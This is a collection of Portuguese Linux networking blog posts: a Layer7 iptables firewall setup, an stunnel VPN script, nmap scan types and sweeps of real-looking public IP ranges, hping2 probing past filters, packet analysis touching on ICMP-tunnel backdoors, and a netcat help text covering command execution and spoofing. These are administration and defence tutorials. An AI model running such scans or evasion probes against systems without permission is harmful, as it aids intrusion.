entao para baixar o kernel, use o link abaixo http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.14.tar.bz2

Iptables
Para o iptables, use o link abaixo http://www.netfilter.org/projects/iptables/files/iptables-1.3.4.tar.bz2

Ferramentas
os outros pacotes, voce pode instalar pelo apt apt-get install gcc make libncurses5-dev

Layer7
Os patchs do Layer7 voce pega no link abaixo http://ufpr.dl.sourceforge.net/sourceforge/l7-filter/netfilter-layer7-v2.1.tar.gz

Layer7 protocolshttp://ufpr.dl.sourceforge.net/sourceforge/l7-filter/l7-protocols-2006-01-22.tar.gz

Descompactando as aplicacoes
Bom, eu so ponho que voce tenha baixado todos os pacotes em /usr/src caso nao tenha feito isso, mova-os pra la cd /usr/src
tar -xjvf netfilter-layer7-v2.1.tar.gz
tar -xjvf iptables-1.3.4.tar.bz2
tar -xjvf linux-2.6.14.tar.bz2
tar -xzvf l7-protocols-2006-01-22
mv l7-protocols-2006-01-22 /etc/l7-protocols

Aplicando os patchs de layer7
Agora com os aplicativos descompactados, podemos aplicar os patchs do layer7, vamos iniciar pelo kernel

no kernelcd /usr/src/linux-2.6.14
patch -p1 < ../netfilter-layer7-v2.1/kernel-2.6.13-2.6.15-layer7-2.1.patch no iptablescd /usr/src/iptables-1.3.4 patch -p1 < ../netfilter-layer7-v2.1/iptables-layer7-2.1.patch chmod +x extensions/.layer7-test Compilando o kernel Aqui eu espero que voce saiba compilar um kernel sem problemas, caso nao saiba sugiro que voce aprenda algumas coisas antes de tentar implanter este tipo de servico, pois voce esta pulando alguns passos Para iniciarmos a compilacao do kernel vamos ate o diretorio cd /usr/src/linux-2.6.14.3 make menuconfig dentro do menu, vamos seguir o seguinte caminho Networking --->
Networking options --->
[*] Network packet filtering (replace ipchains) --->
IP: Netfilter Configuration --->
Layer 7 match support (EXPERIMENTAL)
[ ] Layer 7 debugging output
com estas opcoes selecionadas, e as outras que voce decidir, voce ja pode salvar o arquivo e compilar

Compilando o iptables
Agora que você ja compilou o kernel, e espero que voce o esteja usando agora vamos até o diretorio do iptables cd /usr/src/iptables-1.3.4
make KERNEL_DIR=/usr/src/linux-2.6.14
make install KERNEL_DIR=/usr/src/linux-2.6.14
Os arquivos binários serão instalados em /usr/local/sbin/ ls /usr/local/sbin/
ip6tables iptables iptables-restore iptables-save
desta maneiro, voce pode ou passar o caminho todo no arquivo com as regras ou criar os links em /sbin

Instalando o l7-protocols
Agora precisamos instalar o l7-protocols para que o layer7 saiba como trabalhar com as regras tar -xzvf /usr/src/l7-protocols-2006-01-22.tar.gz -C /usr/src
cd /usr/src/l7-protocols-2006-01-22
make install

Criando uma regra
Agora aqui em baixo, vou colocar um exemplo de uma regra simples #!/bin/bash
#
#
###############################################################
# Script de demonstracao para uso de layer7 criado por
# pruonckk le punk ( pruonckk at pruonckk.org ) para o
# tutorial de firewall com layer7 do DebianForDummies
#
# Este script nao tem nenhuma garantia, use por sua conta
# e risco, eu nao me responsabilizo por qualquer consequencia
# que voce possa ter ao usalo
#
###################################################################
#
modprobe ip_nat_ftp
modprobe ip_conntrack_ftp
modprobe ip_conntrack_irc
#
#
echo "1" > /proc/sys/net/ipv4/ip_forward
#
#
iptables -L
iptables -t nat -L
iptables -t mangle -L
#
#
# Gerando logs do msn
#
iptables -A FORWARD -m layer7 --l7proto msnmessenger -j LOG --log-prefix "msn : "
#
# Gerando logs de emule
iptables -A FORWARD -m layer7 --l7proto edonkey -j LOG --log-prefix "edonkey : "
iptables -A FORWARD -m layer7 --l7proto gnutella -j LOG --log-prefix "gnutella : "
#
#######################
## exemplo de bloqueio
## OBS: O bloqueio deve ser feito antes do log, para que nao
## confunda o administrador
# iptables -A FORWARD -m layer7 --l7proto msnmessenger -j DROP
#
#
# Mascarando saida das conexoes
#
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
# OBS: Substitua eth0 pela sua interface ligada a internet
#

Salve este arquivo em /etc/init.d com o nome de firewall
para acrescentar ele na inicializacao do debian, execute os comando abaixo chmod +x /etc/init.d/firewall
ln -s /etc/init.d/firewall /etc/rc2.d/S99firewall
Feito isso, voce pode testar as conexoes e acompanhar os logs, e acrescentar os bloqueios de acordo com sua necessidade.

Essas informações foram retiradas de:
http://www.debianfordummies.org/wiki/index.php/Firewall_com_Layer7

Espero que ajude alguém.

[]'s

Script para construção de VPN-SSL

2007-01-18T09:36:00.000-02:00

Este artigo que segue é de autoria do kl0nez, eu modifiquei algumas partes e pode ser achado na integra em:
[ http://www.e-secure.com.br/linux/index.php?page=VpnOMatic ]

Bem, vamos lá:

Algumas vezes sentimos a necessidade de construir uma VPN de forma rápida, segura e fácil, porém, nem sempre possuímos a flexibilidade necessária no ambiente para que esta VPN possa ser implementada pelos métodos convencionais, conforme exemplos abaixo:

ip-sec, necessita que esteja habilitado o forward do protocolo ip_gre no firewall, além do tráfego upd na porta 500 (em algumas implementações), e mesmo com a opção road-warrior habilitada, ainda fica uma pequena dificuldade na manipulação de endereços IP (pontaA, pontaB, gateways, firewalls, etc.) como no tráfego entre as pontas da VPN.

pptp, bastante utilizado quando se deseja que estações windows se conectem utilizando o cliente built-in ( dial-up VPN ), porém existem alguns artigos (quando eu encontrar o URL eu posto) que conseguem quebrar o sistema de criptografia, este tipo de VPN eu recomendo somente em casos extremos onde nenhuma outra alternativa é possível.

Com base nestas restrições das implementações mais comuns, não entrei no assunto do l2tp, porque ainda não tive necessidade de implementar algo utilizando este protocolo e portanto não tenho muita experiência para falar sobre isto, mas voltando ao assunto, estas restrições acabam limitando bastante quando se deseja uma VPN de forma rápida e extremamente flexível.

Partindo desta necessidade, encontrei uma implementação de SSL (secure socket layer) que possibilita várias construções de layout, o que torna muido mais flexível qualquer utilização ( www.stunnel.org ).

Porque SSL ?

Atualmente, grande parte dos sistemas de segurança de e-commerce, home-banking, etc. todos utilizam do SSL para garantir a autenticidade e confidencialidade das transações. Outo ponto positivo do SSL é o suporte a PKI o que melhora bastante a checagem das chaves.

Onde utilizar SSL ?

Implementando ssl para POP e SMTP:

stunnel -p /diretorio/do/seu/arquivo.pem -d 995 -r ip.do.seu.servidor.pop:110
stunnel -p /direotiro/do/seu/arquivo.pem -d 465 -r ip.do.seu.serivdor.smtp:25

Com este tipo de utilização, voce pode executar estes processos no seu gateway e garantir que todas as conexoes pop e stmp estejam criptografadas.

Criando uma VPN:

Ufa, finalmente chegamos ao que interessa...

Para facilitar, estou colocando um script bash que jah executa todos os comandos, em caso de dúvida sobre algum trecho especifico, envie um e-mail que eu explico e adiciono aqui os comentarios.

#!/bin/bash

mkdir ~/.vpn.o.matic
cd ~/.vpn.o.matic
echo "Entre com a porta que a VPN irá utilizar "
read PORT
echo "Entre o endereco IP do servidor"
read SERVERIP
echo "Entre com o endereço IP da estação cliente"
read CLIENTIP
echo "Entre com ip da VPN na ponta servidor"
read IPVPNA
echo "Entre com ip da VPN na ponta cliente"
read IPVPNB

echo "Criando Script para ser usado no servidor..."
echo ""

cat > vpn_server << .EOF.
#!/bin/bash
#Script para ser usado no servidor
/usr/sbin/stunnel -d $PORT -v 3 -D 7 -a /var/lib/ssl/certs/trusted -p /var/lib/ssl/certs/pontaA.pem -L /usr/sbin/pppd -- pppd local file /etc/ppp/options.vpnA
.EOF.

openssl req -new -x509 -days 365 -nodes -out pontaA.pem -keyout pontaA.pem
CERTA=`openssl x509 -hash -noout -in pontaA.pem`
openssl req -new -x509 -days 365 -nodes -out pontaB.pem -keyout pontaB.pem
CERTB=`openssl x509 -hash -noout -in pontaB.pem` echo > options.vpnA

scp pontaB.pem root@$SERVERIP:/var/lib/ssl/certs/trusted/$CERTB.0
scp pontaA.pem root@$SERVERIP:/var/lib/ssl/certs/pontaA.pem
scp options.vpnA root@$SERVERIP:/etc/ppp
scp vpn_server root@$SERVERIP:/usr/local/bin

ssh root@$CLIENTIP "chmod 755 /usr/local/bin/vpn_server ; chmod 600 /var/lib/ssl/certs/trusted/$CERTB.0 ; chmod 600 /var/lib/ssl/certs/pontaA.pem"

echo "Criando scripts para serem usados no cliente..."
echo ""

cat > vpn_client << .EOF.
#!/bin/bash
#Script para ser usado do lado do Cliente
/usr/sbin/stunnel -p /var/lib/ssl/certs/pontaB.pem -c -r $SERVERIP:$PORT -D 7 -L /usr/sbin/pppd -- pppd local file /etc/ppp/options.vpnB & .EOF. echo "$IPVPNA:$IPVPNB" > options.vpnB

scp pontaA.pem root@$CLIENTIP:/var/lib/ssl/certs/trusted/$CERTA.0
scp pontaB.pem root@$CLIENTIP:/var/lib/ssl/certs/pontaB.pem
scp options.vpnB root@$CLIENTIP:/etc/ppp
scp vpn_client root@$CLIENTIP:/usr/local/bin

ssh root@$CLIENTIP "chmod 755 /usr/local/bin/vpn_client ; chmod 600 /var/lib/ssl/certs/trusted/$CERTA.0 ; chmod 600 /var/lib/ssl/certs/pontaB.pem"

Espero que tenha ajudado alguém. Qualquer dúvida, é só entrar em contato.

Abraços a todos.

Mário Miranda de Magalhães

.:: The Network Mapper ::.

2006-07-04T04:38:00.000-03:00

Nmap é uma ferramenta destinada a administração de redes onde podemos detectar as portas (TCP e UDP) abertas em computadores remotos ou locais. Além disso também possui muitas outras características que fazem deste Network Scan o melhor de todos (IMHO), tais como detecção remota do sistema operacional via impressão digital TCP ( TCP fingerprint ), uma técnica desenvolvida por seu criador Fyodor, entre muitas outras que servem também para "tapear" alguns firewalls bem como detectá-los. Veremos ao longo deste artigo como usar essas opções para descobrir furos em nossa rede, e também em em outras redes :). Vejamos as opções de cada técnica usada para cada tipo de varredura.

-sT scan via TCP connect() : É o tipo mais básico de scaneamento facilmente logado por um firewall. Utiliza a chamadaconnect(), pode-se implementar um scan desse com menos de 100 linhas de código C ( apenas detecção de portas ).

-sS scan via TCP SYN : este já é um tipo mais requintado de varredura apenas registrado por firewalls mais atuais(acredito que a ultima versão do portsentry já detecta este tipo de scan). Este tipo de scan baseia-se no fato de não fechar uma conexão TCP completa, ou seja utiliza uma "meia-conexão". É enviada uma flag SYN como se fosse ocorrer uma conexão normal um SYN/ACK nos mostra que a porta está em listen e um RST nos indica que a porta está fechada. No caso de ser recebido um SYN/ACK é enviado automaticamente um RST fechando a conexão.

-sF -sX -sN scan via Stealth FIN, Xmas Tree e Null scan, Respectivamente: nem sempre o modo SYN scan é bom o suficiente. Esses tipos de scan normalmente são passados despercebidos.

::..OBS..:: estes tipos de varredura não funcionam em maquinas rodando Windoze, Cisco, BSDI, HP/UX, MVS e IRIX pelo fato de não seguirem os padrões da RFC 794 pp 64).

-sP Ping Scan : Serve para verificar quais hosts estão online. A idéia básica é enviar um echo request para a maquina, ou maquinas, que você deseja saber se estão online. Porém alguns sites costumas bloquear os echo request, para isso isso o Nmap pode enviar também um pacote ACK se então recebermos um RST significa que o host esta "de pé".

-sU UDP scan : determina as portas UDP que estão abertas na máquina remota. Para isso é enviado um pacote UDP com 0 byte para cada porta da maquina alvo. Se no for recebida um mensagem ICMP de porta inalcansável a porta está fechada do contrário a porta está aberta.

::..OBS..:: Se não especificado nenhum tipo de scan será utilizado -sT por default.

Muito bem agora que já sabemos os tipos de scan e como eles funcionam vamos as opções e claro também como elas funcionam:

-O : Identificação do sistema operacional via TCP fingerprint, nos mostra qual sistema operacional está rodando em determinado host. O autor do Nmap escreveu um artigo sobre esse assunto em http://www.insecure.org/nmap/nmap-fingerprinting-article.html e você encontra uma versão em português em http://www.absoluta.org/absoluta/seguranca/seg_detect_os.html.

Descrição dos testes:
Tseq -> Teste do número Sequencial ( SEQ )T1 -> Pacote SYN com várias opções enviado para um porta TCP aberta.T2 -> Pacote NULL com as mesmas opções para uma porta aberta.T3 -> Pacotes SYNFINURGPSH com as mesmas opções para uma porta aberta.T4 -> Pacote ACK para uma porta aberta.T5 -> SYN para uma porta fechada.T6 -> ACK para uma porta fechada.T7 -> FINPSHURG para uma porta fechada.PU -> Pacote UDP para uma porta fechada.

# Esta impressão digital foi uma colaboração de qnex@ssw.krakow.plFingerprint Linux 2.3.12TSeq(Class=RI%gcd=<20%si=>DDDD)T1(Resp=Y%DF=N%W=3F25%ACK=S++%Flags=AS%Ops=MENNTNW)T2(Resp=N)T3(Resp=Y%DF=N%W=3F25%ACK=S++%Flags=AS%Ops=MENNTNW)T4(DF=N%W=0%ACK=O%Flags=R%Ops=)T5(DF=N%W=0%ACK=S++%Flags=AR%Ops=)T6(DF=N%W=0%ACK=O%Flags=R%Ops=)T7(DF=N%W=0%ACK=S%Flags=AR%Ops=)PU(DF=N%TOS=C0A00%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
TSeq(Class=RI%gcd=<20%si=>DDDD)O valor de Class significa que o valor do SEQ ( número seqüencial ) é incrementado randomicamente ( RI == Random Increments ). Caso o valor de Class fosse igual a i800 significaria que o valor de SEQ é multiplicado de 800 do ultimo SEQ ( valores em Hexa ).

Vejamos agora alguns outros valores dos outros testes acima:
Resp=Y : significa que ouve resposta para este teste;
DF=N : significa que o bit de não fragmentação (Don't Fragment) da resposta não deve/não foi setado;
ACK=S++ : significa que o valor do ACK deve ser o valor inicial do SEQ mais 1;
ACK=S : acho que esse você adivinha ;)
Flags=AS : significa que recebemos de resposta as flags SYN e ACK;Flags=R : recebemos apenas um RST como resposta;
TOS=0 : significa que o campo IP Tipo do Serviço foi 0;
IPLEN : valor total do campo IP length do cabeçalho da mensagem IP ( em hexa);
RIPTL : total do comprimento do cabeçalho IP que é devolvido para nós;
RID=E : Valor que temos de volta numa copia do nosso pacote UDP original.

Todos estes dados que obtemos de resposta são comparado com o arquivo nmap-os-fingerprints para ver a impressão digital da sua maquina não basta apenas usar o opção -O você deve colocar também a opção -d. Por exemplo :
[root@OwneD /]# nmap -sS 127.0.0.1 -O -d

Por falar em root é importante mencionar que o Nmap deve ser executado com o superusuário sempre que possível por questões de desempenho e acesso ao sistema.

-I essa opção utiliza o servidor identd para saber quem está rodando determinados processos de um servidor tipo httpd em listen na porta 80. Utiliza uma conexão TCP completa ( -sT ) e claro a máquina scaneada deve estar com o servidor identd rodando.
-v modo verboso.
-o grava a saída em um arquivo de texto.
-i lê os "alvos" a partir de um arquivo.
-p essa opção é bastante interessante como ela você podeespecificar quais portas deseja verificar que estão em listen.

[root@OwneD /]# nmap 127.0.0.1 -p 21,22,23,80,110,666-1024
Com isso serão scaneadas as portas 21,22,23,80,110 e de 666 até 1024. Para verificar todas as portas basta executar:

[root@OwneD /]# nmap 127.0.0.1 -p 1-65535

-F modo Fast Scan diz ao nmap para scanear apenas as portas do serviços existentes no arquivo nmap-services. Essa opção é a padrão.
-g especificar a porta do seu micro de onde será feito scan.
-M número máximo de sockets para ser usado em paralelo com TCP connect(). Isso pode evitar de derrubar algumas Win Box que são normalmente mais frágeis :). Você pode usar -sS para evitar esse problema.

Especificação do alvo.
Você pode especificar os endereços IP das maquinas a serem scaneadas de varia formas.

[root@OwneD /]# nmap -sS 200.248.156.*

Este comando scaneará todos os IP de 200.248.156.0 até 200.248.156.255.

[root@OwneD /]# nmap -sS 200.248.156.0-255

Este comando produz o mesmo efeito do primeiro. Você pode colocar o * em qualquer lugar como por exemplo :

[root@OwneD /]# nmap -sP 200.248.*.66

Ou

[root@OwneD /]# nmap -sP 200.248.0-255.66 # Mesmo resultado

Este comando mostrará os hosts que estão ativos no momento.

Espero ter sido claro.

Abraços a todos

Mário Miranda

Usando o Hping2

2005-09-21T09:38:00.000-03:00

O Hping2 é um software que envia requisições de pacotes utilizando diferentes tipos de payloads e headers, uma ferramenta extremamente útil para spoof de pacotes e packet injection em redes. Ele utiliza libpcap para operar e consegue jogar pacotes por trás de filtros, tornando-se assim extremamente interessante e versátil!

Vamos fazer um teste simples com o hping2. Usaremos o comando mais básico dele:

$ hping2 localhost
RootSec:/ # hping2 localhost
HPING localhost (lo 127.0.0.1): NO FLAGS are set, 40 headers + 0 data
bytes
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=0 flags=RA seq=0 win=0 rtt=1.4 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=0 flags=RA seq=1 win=0 rtt=1.0 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=0 flags=RA seq=2 win=0 rtt=0.4 ms

Bom, a primeira vista ele nos retornou respostas normais como um ping faria. Mas ele nos retorna algumas informações preciosas: flags. Como falei de payload anteriormente, também devemos acrescentar que no TCP/IP, quando estamos realizando o ThreeWay-Handshake (se não conhece tente pesquisar), as portas do sistemas retornam flags junto ao payload indicando se estão disponíveis ou não pra conexão:

flag=SA significa disponível

flag=RA significa indisponível.

Para o primeiro teste vamos utilizar o iptables barrando comunicação ICMP no nosso host:

# iptables -A INPUT -p icmp -j DROP

$ ping localhost
PING localhost (127.0.0.1) 56(84) bytes of data.

--- localhost ping statistics ---
3 packets transmitted, 0 received, 100% packet loss, time 1999ms

Como vimos acima, enviamos 3 pacotes e não recebemos nenhum de volta, ou seja os pacotes foram filtrados.

Agora entra em cena o hping, onde não precisamos obrigatoriamente enviar requisições ICMP para pingar o host, podemos usar pacotes SYN:

# hping --icmp localhost
HPING localhost (lo 127.0.0.1): icmp mode set, 28 headers + 0 data bytes

--- localhost hping statistic ---
2 packets transmitted, 0 packets received, 100% packet loss

round-trip min/avg/max = 0.0/0.0/0.0 ms /* Foi bloqueado */

# hping --syn localhost

HPING localhost (lo 127.0.0.1): S set, 40 headers + 0 data bytes
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=0 flags=RA seq=0 win=0 rtt=11.1
ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=0 flags=RA seq=1 win=0 rtt=0.4 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=0 flags=RA seq=2 win=0 rtt=0.4 ms

--- localhost hping statistic ---
3 packets tramitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 0.4/4.0/11.1 ms

Conseguimos, o host que estava bloqueando requisições ping com echo_request agora não pode fazer nada contra nossa requisição usando pacotes --syn.

Vamos mais além agora, vamos usar o hping para verificar portas filtradas em nosso sistema alvo. Iremos utilizar o mesmo princípio usado acima. Como exemplo usaremos a porta 25.

tcp    0   0 127.0.0.1:25      0.0.0.0:*          LISTEN

Se conectarmos com telnet nela teremos a resposta do servidor de email que configuramos no em nossa máquina:

$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 I-secure.local ESMTP Postfix
quit

Muito bem, tendo em vista que a porta esta aberta normalmente vamos verificá-la usando o hping:

# hping2 --syn localhost -p 25
HPING localhost (lo 127.0.0.1): S set, 40 headers + 0 data bytes
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=25 flags=SA seq=0 win=32767 rtt=3.1 ms
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=25 flags=SA seq=1 win=32767 rtt=0.6 ms

--- localhost hping statistic ---
2 packets tramitted, 2 packets received, 0% packet loss
round-trip min/avg/max = 0.6/1.9/3.1 ms

Ele nos retornou a flag SA, significa que a porta está aberta e esperando conexão. Agora iremos filtrá-la com o iptables:

# iptables -A INPUT -p tcp --dport 25 -j DROP

Seria esse o método que a maioria de nós usaria não é?

Ok, vamos agora tentar obter alguma informação usando o hping:

# hping --syn localhost -p 25
HPING localhost (lo 127.0.0.1): S set, 40 headers + 0 data bytes
ICMP Packet filtered from ip=127.0.0.1 name=localhost port=25
ICMP Packet filtered from ip=127.0.0.1 name=localhost port=25
ICMP Packet filtered from ip=127.0.0.1 name=localhost port=25

Hum, interessante, ele nos mostrou que a porta estava sendo "filtrada", portanto o que podemos concluir? Que a porta está aberta do outro lado, e que o serviço provavelmente está on-line.

Esta conclusão é importante, vejamos por exemplo quem em nosso servidor tem um filtro de portas liberando apenas algumas portas como 80, 21 e 25. Existe um software chamado barricade que mediante determinado pacote ICMP de tamanho de flags determinadas, desativa o filtro e libera a porta e quando o cliente fecha ele volta a travar a porta.

Imaginem o perigo desse tipo de ferramenta em nossa rede, então devemos não apenas filtrar, mas controlar o quê está sendo usado no servidor.

(Maiores informações com y2hack no artigo do Viva o Linux: http://www.vivaolinux.com.br/artigos/verArtigo.php?codigo=1067&pagina=3# )

Considerações finais

Bom, chegamos ao final deste texto tão prometido. Espero ter ajudado alguém a adicionar um pouco de conhecimento a mais. Existem infinitos esquemas usando hping com spoofing e outras técnicas, cabem a todos desvendá-las.

Abraços

Mário Miranda de Magalhães

Analise de pacotes TCP/ ICMP

2005-09-19T10:48:00.003-03:00

(Retirado de um algum lugar a muito tempo atrás e com créditos reclamados pelo y2h4ck)

Como disse anteriormente, o tutorial de spoofing com o hping2 está pronto. Mas para as pessoas poderem entenderem melhor como funciona o esquema, resolvi antes colocar como se faz uma analise de pacotes IP e ICMP. Para assim ver como funciona uma rede de verdade!

Pequena explicação sobre payload

Como sabemos, os esquemas de backdooring vão evoluindo muito com o tempo, temos backdoors que são extremamente furtivas e que não precisam nem bindar portas em servidores, são os casos de wwwtunnels, e túneis de ICMP que são ativados por pacotes de determinados tamanhos.

Quando analisamos um pacote que enviamos na internet (rede), ele teria essa cara:

+---------------+--------------------------+

  Header               Payload

+---------------+--------------------------+

Onde o header carrega as informações de onde o pacote vem para onde o pacote vai e o Payload carrega o conteúdo do pacote principal, como por exemplo os dados que estamos transmitindo.

Vamos analisar um pacote real, usando um pacote ICMP comum de um ping por exemplo:

14:05:07.647489 localhost > localhost: icmp: echo request (DF)

(ttl 64, id 0, len 84)

    4500 0054 0000 4000 4001 3ca7 7f00 0001      E..T..@.@.<.....

    7f00 0001 0800 4e26 8407 0001 c3ac dd40      ......N&.......@

    90e0 0900 0809 0a0b 0c0d 0e0f 1011 1213      ................

    1415 1617 1819 1a1b 1c1d 1e1f 2021 2223      ............ !"#

    2425 2627 2829 2a2b 2c2d 2e2f 3031 3233      $%&'()*+,-./0123

    3435 3637

    Vamos desvendar esse pacote:

14:05:07.647489 localhost > localhost: icmp: echo request (DF)

(ttl 64, id 0, len 84)

Essa linha contém o header do nosso pacote, como podemos ver temos a hora que o pacote foi enviado, de onde foi enviado, > para quem foi enviado, o tipo de pacote (icmp) echo_request, e as informações adicionais como ttl, e uma coisa importante, o id do pacote.

    4500 0054 9a7a 0000 4001 e22c 7f00 0001      E..T.z..@..,....

    7f00 0001 0000 5626 8407 0001 c3ac dd40      ......V&.......@

    90e0 0900 0809 0a0b 0c0d 0e0f 1011 1213      ................

    1415 1617 1819 1a1b 1c1d 1e1f 2021 2223      ............ !"#

    2425 2627 2829 2a2b 2c2d 2e2f 3031 3233      $%&'()*+,-./0123

    3435 3637

Esse é o Payload do nosso pacote contendo as informações que estamos transmitindo, essa saída ao lado:

E..T.z..@..,....

......V&.......@

................

............ !"#

$%&'()*+,-./0123

Foi o que o ethereal transformou em ASCII para nos podermos ler. Você entendeu algo? Bom eu também não, mas isso não importa, vamos continuar nossa análise, você verá que esse pequeno conhecimento guardado até agora será muito importante em nossa análise.

Verificando padrões

No Payload temos algumas coisas que são padrões, como por exemplo, a segunda linha, segunda coluna, vamos analisá-la um pouco.

 7f00 0001 0800 4e26 8407 0001 c3ac dd40

Iremos analisar vários pacotes e ver o que ocorre a esta linha:

14:12:08.089911 localhost > localhost: icmp: echo request (DF)

(ttl 64, id 0, len 84)

    4500 0054 0000 4000 4001 3ca7 7f00 0001      E..T..@.@.<.....

    7f00 0001 0800 619c 9d07 000b 68ae dd40      ......a.....h..@

    c75e 0100 0809 0a0b 0c0d 0e0f 1011 1213      .^..............

    1415 1617 1819 1a1b 1c1d 1e1f 2021 2223      ............ !"#

    2425 2627 2829 2a2b 2c2d 2e2f 3031 3233      $%&'()*+,-./0123

    3435 3637                                    4567

14:12:08.090105 localhost > localhost: icmp: echo reply

(ttl 64, id 39567, len 84)

    4500 0054 9a8f 0000 4001 e217 7f00 0001      E..T....@.......

    7f00 0001 0000 699c 9d07 000b 68ae dd40      ......i.....h..@

    c75e 0100 0809 0a0b 0c0d 0e0f 1011 1213      .^..............

    1415 1617 1819 1a1b 1c1d 1e1f 2021 2223      ............ !"#

    2425 2627 2829 2a2b 2c2d 2e2f 3031 3233      $%&'()*+,-./0123

    3435 3637                                    4567

... ( muitas linhas )

14:12:07.080130 localhost > localhost: icmp: echo reply

(ttl 64, id 39566, len 84)

    4500 0054 9a8e 0000 4001 e218 7f00 0001      E..T....@.......

    7f00 0001 0000 55c4 9d07 000a 67ae dd40      ......U.....g..@

    dc37 0100 0809 0a0b 0c0d 0e0f 1011 1213      .7..............

    1415 1617 1819 1a1b 1c1d 1e1f 2021 2223      ............ !"#

    2425 2627 2829 2a2b 2c2d 2e2f 3031 3233      $%&'()*+,-./0123

    3435 3637

Como vimos, apartir da segunda coluna os valores mudam, antes não, isso já pode nos dar um padrão para analisar, vamos ver como ocorre, isso em um tráfego TCP normal:

14:14:50.624177 201.0.11.121.32891 > 192.94.73.21.telnet:

P [tcp sum ok]

196:203(7) ack 184 win 5808

(DF) [tos 0x10] (ttl 64, id 944, len 59)

    4510 003b 03b0 4000 4006 5910 c900 0b79      E..;..@.@.Y....y

    c05e 4915 807b 0017 a787 ab3e 99fb 7ab0      .^I..{.....>..z.

    8018 16b0 984d 0000 0101 080a 0008 b2de      .....M..........

    0000 0006 7932 6834 636b 0a                  ....y2h4ck.

14:14:51.147184 192.94.73.21.telnet > 201.0.11.121.32891:

P [tcp sum ok]

193:205(12) ack 203 win 17520

570078> [telnet WILL

ECHO] [tos 0x10]  (ttl 49, id 39061, len 64)

    4510 0040 9895 0000 3106 1326 c05e 4915      E..@....1..&.^I.

    c900 0b79 0017 807b 99fb 7ab9 a787 ab45      ...y...{..z....E

    8018 4470 0f3f 0000 0101 080a 0000 002e      ..Dp.?..........

    0008 b2de fffb 0150 6173 7377 6f72 643a      .......Password:

14:14:55.497348 64.12.24.192.https > 201.0.11.121.filenet-nch:

. [tcp sum ok] ack 6 win 16384 (DF) (ttl 104, id 37429, len 40)

    4500 0028 9235 4000 6806 5355 400c 18c0      E..(.5@.h.SU@...

    c900 0b79 01bb 8002 abf8 d80f 5c38 5546      ...y........8UF

    5010 4000 8b4a 0000                          P.@..J..

Analisem a linha que acabamos de ver nesse caso, viu, elas não permanecem inalteradas, elas vão modificando seu valor juntamente aos outros, então já temos duas conclusões, os Payloads são tratados diferentemente em pacotes com estado e em pacotes ICMP sem estado.

Você se pergunta agora, em que isso me ajudará?
Digamos que você está analisando seu tráfego ICMP e de repente se depara com um padrão alterado, a primeira vista provavelmente você nem sequer se daria conta desse "padrão" diferente. Essa situação seria encontrada em túneis ICMP para serviços de HTTP, como por exemplo o wwwtunel (disponível em http://www.thc.org/), onde o tráfego da backdoor em túnel é encapsulado dentro de chamadas ICMP, passando assim desapercebido (ou quase) pela nossa análise.

Bem, a partir daqui já se tem uma idéia de como se funciona o tráfego de informações em redes/internet. O próximo texto será como usar esse conhecimento junto com o HPING2.

Espero ter sido bem claro.

Abraços

Mário Miranda de Magalhães

Usando o Netcat

2005-09-01T10:04:00.000-03:00

Netcat é uma das mais versáteis ferramentas de rede que eu conheço. Então aqui vai um pouco da minha experiênica nesse programa maravilhoso.

Esse é um artigo básico das funcionalidades do Netcat. Com um pouco de imaginação e criatividade você pode transformá-lo numa ferramenta, digamos, bastante útil para qualquer tipo de aplicação.

Para começar:

$ nc -h

A tradução do "help" dele está aí em baixo.

-e "comando" .:[ Executa o comando especificado usando como entrada (stdin) os dados recebidos pela rede e enviando os dados de saída (stdout e stderr) para a rede. Essa opção somente estará presente se o nc for compilado com a opção GAPING_SECURITY_HOLE, já que permite que usuários disponibilizem programas para qualquer um conectado a rede. ]:.

-i .:[ Especifica o intervalo de tempo no qual as linhas de texto serão enviadas ou recebidas. ]:.

-l .:[ Coloca no netcat em estado de escuta (listening) ]:.

-L .:[Coloca no netcat em estado de escuta (listening), reiniciando o netcat com a mesma linha de comando caso a conexão feche ]:.

-n .:[ Força o netcat a usar apenas endereços de IP numéricos, sem fazer consultas a servidores DNS; ]:.

-o "filename" .:[ Usando para obter um log dos dados de entrada ou saída, em formato hexadecimal; ]:.

-p .:[ Especifica a porta a ser usada, sujeito a disponibilidade e a restrições de privilégio; ]:.

-r .:[ Faz as portas do portscan serem escolhidas aleatóriamente; ]:.

-s .:[ Especifica o endereço IP da interface usada para enviar os pacotes. Pode ser usado para spoofing de IPs, bastando apenas configurar uma interface do tipo eth0:0 (usando o ifconfig) com o IP desejado; ]:.

-t .:[ Permite usar o nc para criar sessões de telnet por script. Precisa estar compilado com a opção -DTELNET; ]:.

-u .:[ Usar UDP ao invés de TCP ]:.

-v .:[ Controla o nível de mensagens mostradas na tela; ]:.

-w .:[ Limita o tempo máximo para que uma conexão seja estabelecida; ]:.

-z .:[ Para evitar o envio de dados através de uma conexão TCP, e limitar os dados de uma conexão UDP. ]:.

É muito importante lembrar que comandos e sintaxes do Linux podem ser misturadas, assim como a utilização de pipes( ), <, > e >>.

Veremos agora, a versatilidade e utilização dos comandos em ação, ou seja a mão na massa:

1- Conectando-se a um host
É feita da mesma maneira que o telnet. É especificado apenas um host e a porta a se conectar.
Exemplos:
$ nc mail.yahoo.com.br 110
$ nc www.uol.com.br 80

Lembrando que a porta 110 é dos servidores de POP3 e a 80 é de servidores web.

2- Abrindo uma porta (listenning)
É utilizada a sintaxe -l para colocar em listenning e -vv para retornar eco com detalhes.
A seguir é estipulada a porta:
$ nc -l -p 53 -vv

Será retornada uma mensagem: "listenning on [any] 53 ... "

3- Transferindo Arquivos

Transferir arquivos de um host para outro usando o netcat é bastante simples. Basta configurar o lado server (que vai receber o arquivo) para "escutar" uma porta específica e redirecionar todos os dados recebidos para um arquivo. Colocando-se um timeout, o servidor irá perceber quando não existem mais dados chegando e irá fechar a conexão.
